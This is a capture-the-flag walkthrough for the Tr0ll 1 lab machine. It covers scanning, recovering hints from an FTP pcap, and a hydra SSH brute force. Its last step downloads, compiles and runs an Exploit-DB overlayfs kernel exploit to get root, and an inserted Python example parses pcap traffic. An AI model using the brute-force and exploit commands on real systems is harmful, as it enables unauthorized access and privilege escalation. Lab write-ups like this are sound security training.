Hello, in this article I will show you step by step how to solve Tr0ll 1. The goal of this CTF is to become root and read /root/proof.txt.
LEVEL : Easy
Steps
- Finding the target's IP address with netdiscover
- Detecting open ports with nmap
- Enumerating the web server on port 80 with dirb and nikto
- Downloading lol.pcap over anonymous FTP and searching it with strings
- Following the hidden web paths to the roflmao binary and the credential files
- Finding valid SSH credentials by brute force with hydra
- Becoming root with a kernel exploit
Starting from the Kali machine's own IP address, the target's address in the same /24 was found with netdiscover.
netdiscover -r 192.168.88.0/24

Open ports on the target were enumerated with a full-range nmap scan (-p- covers all 65535 TCP ports, -A adds version, OS and script detection, -Pn skips host discovery, -n skips DNS, --reason prints why each port was classified as it was).
nmap -A -Pn -n -sV --reason -p- 192.168.88.155


Directories on the open port 80 were brute-forced with dirb.
dirb http://192.168.88.155/

For more information on port 80, the web server was also scanned with nikto. nikto takes a single host with -h (not a subnet range), and -C all makes it check every known CGI directory.
nikto -h 192.168.88.155 -C all

With the paths found above, the target's web server was opened in the browser. The web root and the /secret path were visited; both only served images like the ones shown below, which were downloaded to the Kali machine and inspected without turning up anything useful.

The port scan had also shown an FTP server on the target that allows anonymous login. The anonymous login was done through the browser (an ftp client with user anonymous and any password works just as well) and the only file on the share, lol.pcap, was downloaded.

The downloaded pcap was run through the strings command to see whether it contained any readable text. Among the output, the keyword "sup3rs3cr3tdirlol" stood out in the captured FTP session and was noted for later.
strings lol.pcap

Requesting that keyword as a path on port 80 (http://192.168.88.155/sup3rs3cr3tdirlol/) produced the listing below. The single file in it, named "roflmao", was downloaded to the Kali machine for inspection.

The "roflmao" file was inspected the same way with the strings command, and the hex value "0x0856BF" in the marked area of the picture was noted for checking. (The file is a small executable; strings is enough here, as the hint is stored as plain text inside it.)
strings roflmao
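As an added example (not code from the original walkthrough), the two strings steps above can be redone with a small parser so that a keyword found in lol.pcap is tied to the TCP flow that carried it, and the 0x... hint in roflmao is pulled out directly rather than read off a screenshot. Everything it operates on is constructed inline: the pcap bytes are built by the script itself, the FTP banner and hint sentences are made up, 192.168.88.131 is an assumed address for the Kali machine, and SAMPLE_BLOB is a stand-in for the roflmao binary. The parser handles classic pcap files with an Ethernet link layer, which is what a capture of the FTP session would be.

```python
"""Added example: tie a `strings` hit in a pcap to its TCP flow, and pull hex
hints out of a binary. Sample pcap and binary are constructed below."""
import re
import struct


def printable_strings(data, min_len=4):
    """Runs of printable ASCII at least min_len long; what `strings` prints by default."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def hex_tokens(data):
    """Hex literals such as 0x0856BF embedded anywhere in a file."""
    return [t.decode() for t in re.findall(rb"0x[0-9A-Fa-f]{4,}", data)]


def tcp_payloads(pcap):
    """Yield (src, sport, dst, dport, payload) for every TCP segment that carries data.

    Understands classic pcap (magic 0xa1b2c3d4) in either byte order with an
    Ethernet link layer; non-IPv4 and non-TCP frames are skipped.
    """
    magic = pcap[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(endian + "HHiIII", pcap[4:24])[5]
    if linktype != 1:
        raise ValueError("only LINKTYPE_ETHERNET is handled")
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                   # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:
            continue                                   # not TCP
        total_len = struct.unpack("!H", ip[2:4])[0]
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]             # skip TCP header and options
        if payload:
            src = ".".join(map(str, ip[12:16]))
            dst = ".".join(map(str, ip[16:20]))
            yield src, sport, dst, dport, payload


def flows_with(pcap, keyword):
    """(src:port, dst:port, text) for every TCP segment whose payload contains keyword."""
    return [
        (f"{src}:{sport}", f"{dst}:{dport}", payload.decode(errors="replace").strip())
        for src, sport, dst, dport, payload in tcp_payloads(pcap)
        if keyword.encode() in payload
    ]


def build_pcap(segments):
    """Wrap (src, sport, dst, dport, payload) tuples as Ethernet/IPv4/TCP pcap records.

    Only used to construct sample input; IP and TCP checksums are left at zero.
    """
    def ip4(addr):
        return bytes(int(x) for x in addr.split("."))

    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # global header
    for ident, (src, sport, dst, dport, payload) in enumerate(segments):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ident, 0, 64, 6, 0,
                         ip4(src), ip4(dst)) + tcp
        frame = b"\x00" * 12 + b"\x08\x00" + ip                       # zeroed MACs, EtherType IPv4
        out += struct.pack("<IIII", 1, 0, len(frame), len(frame)) + frame
    return out


# Constructed sample traffic: an anonymous FTP login on the control channel and
# a data-channel line carrying the hint. 192.168.88.155 is the target from the
# walkthrough; 192.168.88.131 is an assumed address for the Kali box.
SAMPLE_PCAP = build_pcap([
    ("192.168.88.155", 21, "192.168.88.131", 40000, b"220 FTP service ready\r\n"),
    ("192.168.88.131", 40000, "192.168.88.155", 21, b"USER anonymous\r\n"),
    ("192.168.88.155", 20, "192.168.88.131", 40001, b"look closer: sup3rs3cr3tdirlol\r\n"),
])

# Constructed stand-in for the roflmao binary: non-printable bytes around one hint string.
SAMPLE_BLOB = bytes(range(20)) + b"Find address 0x0856BF to proceed" + b"\x00\x7f\x45\x4c"

if __name__ == "__main__":
    for src, dst, text in flows_with(SAMPLE_PCAP, "sup3rs3cr3tdirlol"):
        print(f"{src} -> {dst}: {text}")
    print(printable_strings(SAMPLE_BLOB), hex_tokens(SAMPLE_BLOB))
```

Against the real lol.pcap you would read the file with open(path, "rb").read() and pass it to flows_with; the source port and address of the matching segment then tell you whether the hint was typed by the attacker or sent by the server, which plain strings output cannot.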

In the same way, requesting the "0x0856BF" value as a path on port 80 (http://192.168.88.155/0x0856BF/) produced the listing below.

The directories found there were downloaded to the Kali machine. Their contents, a list of candidate usernames (which_one_lo.txt) and a file named Pass.txt, suggest that they are meant for an SSH brute-force attack.

A brute-force attack against SSH with hydra turned up the credentials "overflow:Pass.txt". hydra needs the service to be named, either as ssh://host or as a trailing ssh argument; without it the command below does not run. Note also that -P reads candidate passwords from the contents of Pass.txt, so for hydra to try the string "Pass.txt" itself that string has to be in the wordlist it is given.
hydra -L which_one_lo.txt -P Pass.txt ssh://192.168.88.155

Several privilege-escalation attempts were made after logging in as overflow, but none of them worked. The last step is to download an exploit matching the target's kernel version and become root with it. Exploit-DB entry 37292 is the overlayfs local privilege escalation (CVE-2015-1328) for Ubuntu 12.04 to 15.04 kernels 3.13 through 3.19; check uname -a and /etc/issue on the target first to confirm it falls in that range. The exploit is compiled with the target's own gcc; if a target has no compiler, build a static binary on Kali and transfer it instead. The process is carried out step by step below.
wget https://www.exploit-db.com/download/37292
mv 37292 37292.c
gcc 37292.c -o exploit
./exploit

The exploit worked and returned a root shell. With root obtained, the file /root/proof.txt was read.

Summary
- I solved it and enjoyed it, but I think this CTF is more like a puzzle; it's not OSCP style.
Click here to see my other OSCP walkthrough articles.